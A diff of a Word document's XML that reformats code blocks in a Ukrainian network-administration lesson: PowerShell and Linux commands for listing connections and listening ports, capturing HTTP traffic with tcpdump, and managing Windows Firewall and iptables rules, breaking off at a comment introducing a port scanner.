+        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
         <w:t xml:space="preserve">    Sort-Object RemoteAddress</w:t>
       </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="SourceCode"/>
+        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="SourceCode"/>
+        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
         <w:t xml:space="preserve"># Перегляд активних UDP-з'єднань</w:t>
       </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="SourceCode"/>
+        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
         <w:t xml:space="preserve">Get-NetUDPEndpoint | Select-Object LocalPort, OwningProcess</w:t>
       </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="SourceCode"/>
+        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="SourceCode"/>
+        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
         <w:t xml:space="preserve"># Визначення процесу за PID</w:t>
       </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="SourceCode"/>
+        <w:spacing w:before="0" w:after="120" w:line="200" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
         <w:t xml:space="preserve">Get-Process -Id 1234 | Select-Object Name, Path</w:t>
       </w:r>
     </w:p>
@@ -1649,62 +1657,66 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="SourceCode"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
+        <w:spacing w:before="120" w:after="0" w:line="200" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
         <w:t xml:space="preserve"># Активні з'єднання</w:t>
       </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="SourceCode"/>
+        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
         <w:t xml:space="preserve">ss -tunapl</w:t>
       </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="SourceCode"/>
+        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="SourceCode"/>
+        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
         <w:t xml:space="preserve"># Або через netstat</w:t>
       </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="SourceCode"/>
+        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
         <w:t xml:space="preserve">netstat -tunapl | grep ESTABLISHED</w:t>
       </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="SourceCode"/>
+        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="SourceCode"/>
+        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
         <w:t xml:space="preserve"># Захоплення HTTP-трафіку</w:t>
       </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="SourceCode"/>
+        <w:spacing w:before="0" w:after="120" w:line="200" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
         <w:t xml:space="preserve">sudo tcpdump -i eth0 port 80 -A | head -50</w:t>
       </w:r>
     </w:p>
@@ -2003,185 +2015,195 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="SourceCode"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
+        <w:spacing w:before="120" w:after="0" w:line="200" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
         <w:t xml:space="preserve"># Перегляд поточних правил</w:t>
       </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="SourceCode"/>
+        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
         <w:t xml:space="preserve">Get-NetFirewallRule | Where-Object Enabled -eq True |</w:t>
       </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="SourceCode"/>
+        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
         <w:t xml:space="preserve">    Select-Object DisplayName, Direction, Action</w:t>
       </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="SourceCode"/>
+        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="SourceCode"/>
+        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
         <w:t xml:space="preserve"># Створення правила: блокувати вхідні на порт 23 (Telnet)</w:t>
       </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="SourceCode"/>
+        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
         <w:t xml:space="preserve">New-NetFirewallRule -DisplayName "Block Telnet" `</w:t>
       </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="SourceCode"/>
+        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
         <w:t xml:space="preserve">    -Direction Inbound `</w:t>
       </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="SourceCode"/>
+        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
         <w:t xml:space="preserve">    -LocalPort 23 `</w:t>
       </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="SourceCode"/>
+        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
         <w:t xml:space="preserve">    -Protocol TCP `</w:t>
       </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="SourceCode"/>
+        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
         <w:t xml:space="preserve">    -Action Block</w:t>
       </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="SourceCode"/>
+        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="SourceCode"/>
+        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
         <w:t xml:space="preserve"># Створення правила: дозволити вхідні на порт 443 (HTTPS)</w:t>
       </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="SourceCode"/>
+        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
         <w:t xml:space="preserve">New-NetFirewallRule -DisplayName "Allow HTTPS" `</w:t>
       </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="SourceCode"/>
+        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
         <w:t xml:space="preserve">    -Direction Inbound `</w:t>
       </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="SourceCode"/>
+        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
         <w:t xml:space="preserve">    -LocalPort 443 `</w:t>
       </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="SourceCode"/>
+        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
         <w:t xml:space="preserve">    -Protocol TCP `</w:t>
       </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="SourceCode"/>
+        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
         <w:t xml:space="preserve">    -Action Allow</w:t>
       </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="SourceCode"/>
+        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="SourceCode"/>
+        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
         <w:t xml:space="preserve"># Видалення правила</w:t>
       </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="SourceCode"/>
+        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
         <w:t xml:space="preserve">Remove-NetFirewallRule -DisplayName "Block Telnet"</w:t>
       </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="SourceCode"/>
+        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="SourceCode"/>
+        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
         <w:t xml:space="preserve"># Перевірка статусу брандмауера</w:t>
       </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="SourceCode"/>
+        <w:spacing w:before="0" w:after="120" w:line="200" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
         <w:t xml:space="preserve">Get-NetFirewallProfile | Select-Object Name, Enabled</w:t>
       </w:r>
     </w:p>
@@ -2198,125 +2220,138 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="SourceCode"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
+        <w:spacing w:before="120" w:after="0" w:line="200" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
         <w:t xml:space="preserve"># Перегляд поточних правил</w:t>
       </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="SourceCode"/>
+        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
         <w:t xml:space="preserve">sudo iptables -L -n -v</w:t>
       </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="SourceCode"/>
+        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="SourceCode"/>
+        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
         <w:t xml:space="preserve"># Дозволити вхідні на порт 80 (HTTP)</w:t>
       </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="SourceCode"/>
+        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
         <w:t xml:space="preserve">sudo iptables -A INPUT -p tcp --dport 80 -j ACCEPT</w:t>
       </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="SourceCode"/>
+        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="SourceCode"/>
+        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
         <w:t xml:space="preserve"># Дозволити вхідні на порт 443 (HTTPS)</w:t>
       </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="SourceCode"/>
+        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
         <w:t xml:space="preserve">sudo iptables -A INPUT -p tcp --dport 443 -j ACCEPT</w:t>
       </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="SourceCode"/>
+        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="SourceCode"/>
+        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
         <w:t xml:space="preserve"># Заблокувати вхідні з конкретної IP</w:t>
       </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="SourceCode"/>
+        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
         <w:t xml:space="preserve">sudo iptables -A INPUT -s 10.0.0.100 -j DROP</w:t>
       </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="SourceCode"/>
+        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="SourceCode"/>
+        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
         <w:t xml:space="preserve"># Заборонити все інше (в кінці)</w:t>
       </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="SourceCode"/>
+        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
         <w:t xml:space="preserve">sudo iptables -A INPUT -j DROP</w:t>
       </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="SourceCode"/>
+        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="SourceCode"/>
+        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
         <w:t xml:space="preserve"># Зберегти правила</w:t>
       </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="SourceCode"/>
+        <w:spacing w:before="0" w:after="120" w:line="200" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
         <w:t xml:space="preserve">sudo iptables-save &gt; /etc/iptables.rules</w:t>
       </w:r>
     </w:p>
@@ -2358,149 +2393,150 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="SourceCode"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
+        <w:spacing w:before="120" w:after="0" w:line="200" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
         <w:t xml:space="preserve"># Windows: перевірка прослуховуваних портів</w:t>
       </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="SourceCode"/>
+        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
         <w:t xml:space="preserve">Get-NetTCPConnection -State Listen |</w:t>
       </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="SourceCode"/>
+        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
         <w:t xml:space="preserve">    Select-Object LocalPort, OwningProcess |</w:t>
       </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="SourceCode"/>
+        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
         <w:t xml:space="preserve">    Sort-Object LocalPort</w:t>
       </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="SourceCode"/>
+        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="SourceCode"/>
+        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
         <w:t xml:space="preserve"># Визначення процесів</w:t>
       </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="SourceCode"/>
+        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
         <w:t xml:space="preserve">Get-NetTCPConnection -State Listen |</w:t>
       </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="SourceCode"/>
+        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
         <w:t xml:space="preserve">    ForEach-Object {</w:t>
       </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="SourceCode"/>
+        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
         <w:t xml:space="preserve">        $proc = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue</w:t>
       </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="SourceCode"/>
+        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
         <w:t xml:space="preserve">        [PSCustomObject]@{</w:t>
       </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="SourceCode"/>
+        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
         <w:t xml:space="preserve">            Port = $_.LocalPort</w:t>
       </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="SourceCode"/>
+        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
         <w:t xml:space="preserve">            Process = $proc.Name</w:t>
       </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="SourceCode"/>
+        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
         <w:t xml:space="preserve">            Path = $proc.Path</w:t>
       </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="SourceCode"/>
+        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
         <w:t xml:space="preserve">        }</w:t>
       </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="SourceCode"/>
+        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
         <w:t xml:space="preserve">    } | Sort-Object Port</w:t>
       </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="SourceCode"/>
+        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
         <w:t xml:space="preserve"># Linux</w:t>
       </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="SourceCode"/>
+        <w:spacing w:before="0" w:after="120" w:line="200" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
         <w:t xml:space="preserve">ss -tuln | grep LISTEN</w:t>
       </w:r>
     </w:p>
@@ -2517,827 +2553,894 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="SourceCode"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
+        <w:spacing w:before="120" w:after="0" w:line="200" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
         <w:t xml:space="preserve">// Сканер портів. Збірка у Visual Studio: проєкт консольного застосунку,</w:t>
       </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
